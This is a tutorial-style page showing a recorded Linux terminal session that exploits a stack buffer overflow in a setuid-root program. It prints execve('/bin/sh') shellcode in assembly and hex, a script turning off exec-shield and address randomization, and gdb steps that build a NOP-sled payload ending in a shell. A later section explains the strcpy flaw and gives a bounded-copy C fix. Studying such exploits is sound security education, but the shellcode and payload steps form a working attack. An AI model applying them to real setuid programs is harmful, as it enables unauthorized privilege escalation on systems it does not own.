Buffer Overflow

    -- Sebastian Pawlak, 2006.


A session showing how a stack-based buffer overflow is used to run one's own shellcode.


Source code of the file "sesja2":

[hacka@Jupiter vuln]$ ls
shell.asm  vuln.c
[hacka@Jupiter vuln]$ cat shell.asm
BITS 32
                                                                                
        jmp short data
start:  pop esi
                                                                                
        xor eax, eax
        mov byte [esi + 7], al
        mov long [esi + 8], esi
        mov long [esi + 12], eax
                                                                                
        mov byte al, 0x0b
        mov ebx, esi
        lea ecx, [esi + 8]
        lea edx, [esi + 12]
        int 0x80
                                                                                
        xor ebx, ebx
        mov eax, ebx
        inc eax
        int 0x80
                                                                                
data:   call start
db      '/bin/sh'
[hacka@Jupiter vuln]$ nasm -o shell.bin shell.asm
[hacka@Jupiter vuln]$ ls -l
total 12
-rw-r--r--  1 hacka hacka 400 Mar 31 22:24 shell.asm
-rw-rw-r--  1 hacka hacka  45 Mar 31 22:28 shell.bin
-rw-r--r--  1 hacka hacka 190 Mar 31 22:24 vuln.c
[hacka@Jupiter vuln]$ od -tx1 shell.bin
0000000 eb 1f 5e 31 c0 88 46 07 89 76 08 89 46 0c b0 0b
0000020 89 f3 8d 4e 08 8d 56 0c cd 80 31 db 89 d8 40 cd
0000040 80 e8 dc ff ff ff 2f 62 69 6e 2f 73 68
0000055
[hacka@Jupiter vuln]$ od -tc shell.bin
0000000 353 037   ^   1 300 210   F  \a 211   v  \b 211   F  \f 260  \v
0000020 211 363 215   N  \b 215   V  \f 315 200   1 333 211 330   @ 315
0000040 200 350 334 377 377 377   /   b   i   n   /   s   h
0000055
[hacka@Jupiter vuln]$ gcc -g -o vuln vuln.c
[hacka@Jupiter vuln]$ su root
Password:
[root@Jupiter vuln]# chown root.root vuln
[root@Jupiter vuln]# chmod u+s vuln
[root@Jupiter vuln]# exit
[hacka@Jupiter vuln]$ ls -l
total 24
-rw-r--r--  1 hacka hacka   400 Mar 31 22:24 shell.asm
-rw-rw-r--  1 hacka hacka    45 Mar 31 22:28 shell.bin
-rwsrwxr-x  1 root  root  10651 Mar 31 22:31 vuln
-rw-r--r--  1 hacka hacka   190 Mar 31 22:24 vuln.c
[hacka@Jupiter vuln]$ ./vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[hacka@Jupiter vuln]$ ./vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault
[hacka@Jupiter vuln]$ su root
Password:
[root@Jupiter vuln]# cat ../\!/unprotect.sh
#!/bin/bash
/sbin/sysctl -w kernel.exec-shield=0
/sbin/sysctl -w kernel.randomize_va_space=0
 
[root@Jupiter vuln]# cd ../\!/
[root@Jupiter !]# ./unprotect.sh
kernel.exec-shield = 0
error: 'kernel.randomize_va_space' is an unknown key
[root@Jupiter !]# cd ../vuln
[root@Jupiter vuln]# exit
[hacka@Jupiter vuln]$ gdb ./vuln
GNU gdb Red Hat Linux (6.0post-0.20040223.19rh)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...Using host libthread_db lib
rary "/lib/tls/libthread_db.so.1".
 
(gdb) set args aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
(gdb) r
Starting program: /home/hacka/vuln/vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaa
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
 
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) b func
Breakpoint 1 at 0x8048379: file vuln.c, line 7.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/hacka/vuln/vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaa
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
 
Breakpoint 1, func (p=0xfefff966 'a' <repeats 200 times>...) at vuln.c:7
7           strcpy(buf, p);
(gdb) cont
Continuing.
 
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) set args `perl -e 'print "\x90"x211'; cat shell.bin; perl -e 'print "\x99\
x99\x99\x99"x2'`
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/hacka/vuln/vuln `perl -e 'print "\x90"x211'; cat shell.b
in; perl -e 'print "\x99\x99\x99\x99"x2'`
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
 
Breakpoint 1, func (p=0xfefff98a '\220' <repeats 200 times>...) at vuln.c:7
7           strcpy(buf, p);
(gdb) cont
Continuing.
 
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb) info reg
eax            0x0      0
ecx            0xfffffcf5       -779
edx            0xfefffa93       -16778605
ebx            0x61dffc 6414332
esp            0xfefff708       0xfefff708
ebp            0x90909090       0x90909090
esi            0x2      2
edi            0x6200fc 6422780
eip            0x90909090       0x90909090
eflags         0x210286 2163334
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) x/s 0xfefff708
0xfefff708:      '\220' <repeats 75 times>, " \037^1 \210F\a\211v\b\211F\f \v\21
1 \215N\n\215V\f \2001 \211 @ \200     /bin/sh\231\231\231\231\231\231\231\231"
(gdb) x/s 0xfefff708-100
0xfefff6a4:      '\220' <repeats 175 times>, " \037^1 \210F\a\211v\b\211F\f \b\2
11 \215N\b\215V\f "...
(gdb) set args `perl -e 'print "\x90"x211'; cat shell.bin; perl -e 'print "\xa4\
xf6\xff\xfe"x2'`
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/hacka/vuln/vuln `perl -e 'print "\x90"x211'; cat shell.b
in; perl -e 'print "\xa4\xf6\xff\xfe"x2'`
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
 
Breakpoint 1, func (p=0xfefff98a '\220' <repeats 200 times>...) at vuln.c:7
7           strcpy(buf, p);
(gdb) cont
Continuing.
 
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb) set args `perl -e 'print "\x90"x211'; cat shell.bin; perl -e 'print "\xa4\
xf6\xff\xfe"x4'`
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
 
Starting program: /home/hacka/vuln/vuln `perl -e 'print "\x90"x211'; cat shell.b
in; perl -e 'print "\xa4\xf6\xff\xfe"x4'`
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
 
Breakpoint 1, func (p=0xfefff982 '\220' <repeats 200 times>...) at vuln.c:7
7           strcpy(buf, p);
(gdb) cont
Continuing.
sh-2.05b$
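The session never prints vuln.c itself; the only line it reveals is the gdb breakpoint at vuln.c:7, `strcpy(buf, p);` inside `func()`, which is the whole defect: `strcpy` copies argv[1] until its terminating NUL no matter how large `buf` is, so a long enough argument overwrites the saved frame pointer and return address (the `0x61616161` and `0x90909090` values in `ebp`/`eip` above). The program below is an added example, not the session's vuln.c: it reconstructs a function of the same shape and puts the bounded replacement beside it. The buffer size of 200 bytes and the names `copy_bounded`, `func_hardened` and `overflow_bytes` are assumptions for illustration. Note also that the session had to run `unprotect.sh` (exec-shield off, no address randomization) and build with `gcc -g` and no stack protector before the overwritten return address could be used; with those mitigations left on, the bounded copy is one of several layers rather than the only one.

```c
/* Added example: a reconstruction of a strcpy-into-stack-buffer function like the
 * session's func(), with a bounded replacement. vuln.c is not printed on the page;
 * BUF_SIZE and the function names below are assumptions, not the original source. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 200   /* assumed buffer size for illustration */

/* Bounded copy: writes at most dst_size bytes including the NUL and reports
 * whether the input fit. Returns 0 on success, -1 when src is too long; the
 * caller then rejects the input instead of silently writing past the buffer. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t n = strnlen(src, dst_size);  /* never scans further than dst_size */
    if (n >= dst_size)                  /* no room left for the terminating NUL */
        return -1;
    memcpy(dst, src, n + 1);            /* n characters plus the NUL */
    return 0;
}

/* Same shape as the session's func(): a fixed stack buffer fed from argv[1],
 * but the unbounded strcpy(buf, p) is replaced by copy_bounded(). */
int func_hardened(const char *p)
{
    char buf[BUF_SIZE];
    if (copy_bounded(buf, sizeof buf, p) != 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof buf - 1);
        return 1;
    }
    printf("copied %zu bytes safely\n", strlen(buf));
    return 0;
}

/* How many bytes (including the NUL) strcpy() of a src_len-character string
 * would write past a dst_size-byte buffer; 0 when it fits. Useful for seeing
 * why the 34-character argument in the session was harmless and the longer
 * ones were not, once a buffer size is known. */
size_t overflow_bytes(size_t dst_size, size_t src_len)
{
    return (src_len + 1 > dst_size) ? src_len + 1 - dst_size : 0;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    return func_hardened(argv[1]);
}
```

Built as `gcc -Wall -o vuln_hardened vuln_hardened.c`, the program prints `copied N bytes safely` for short arguments and refuses, with exit status 1, any argument that would not fit; the same long arguments that produced `Segmentation fault` in the session are rejected before a single byte is written to the stack buffer.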